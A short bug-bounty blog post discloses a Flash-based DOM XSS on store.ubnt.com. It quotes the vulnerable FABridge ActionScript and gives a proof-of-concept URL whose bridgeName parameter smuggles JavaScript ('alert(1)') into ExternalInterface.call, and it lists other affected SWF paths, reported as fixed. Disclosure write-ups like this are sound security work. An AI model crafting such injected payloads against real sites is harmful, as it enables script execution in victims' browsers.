Swf XSS (Dom Based Xss)

Hey Folks,

I was working in UBNT for bounty and i found several xss there so i’m sharing one of the cool xss.

function dispatchInit(param1:Event=null) : void {
    if(ExternalInterface.available == false){
        return;
    }
    if(bridgeName == null){
        bridgeName = baseObject.root.loaderInfo.parameters["bridgeName"];
        if(bridgeName == null){
            bridgeName = "flash";
        }
    }
     _registerComplete = ExternalInterface.call("FABridge__bridgeInitialized",[bridgeName]);
    dispatchEvent(new Event(FABridge.INITIALIZED));
}

In the above code the FlashVar parameter “bridgeName” is passed to the ExternalInterface.call method without filtering. It is possible to pass JavaScript code via the bridgeName parameter that will be executed when the vulnerable function is called (when the page loads).

Proof of Concept :

As proof of concept the following URL will inject the JavaScript code “alert(1)” to illustrate the flaw:

https://store.ubnt.com/skin/adminhtml/default/default/media/editor.swf?bridgeName=1\%22]%29%29;alert%281%29}catch%28e%29{alert%281%29}//

store.ubnt.com xss

Some other path:

https://store.ubnt.com/skin/adminhtml/default/default/media/editor.swf 
https://store.ubnt.com/skin/adminhtml/default/default/media/uploader.swf 
https://store.ubnt.com/skin/adminhtml/default/default/media/uploaderSingle.swf

Bug is fixed now.

Best Regard
Shubham

 

shubhamgupta

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.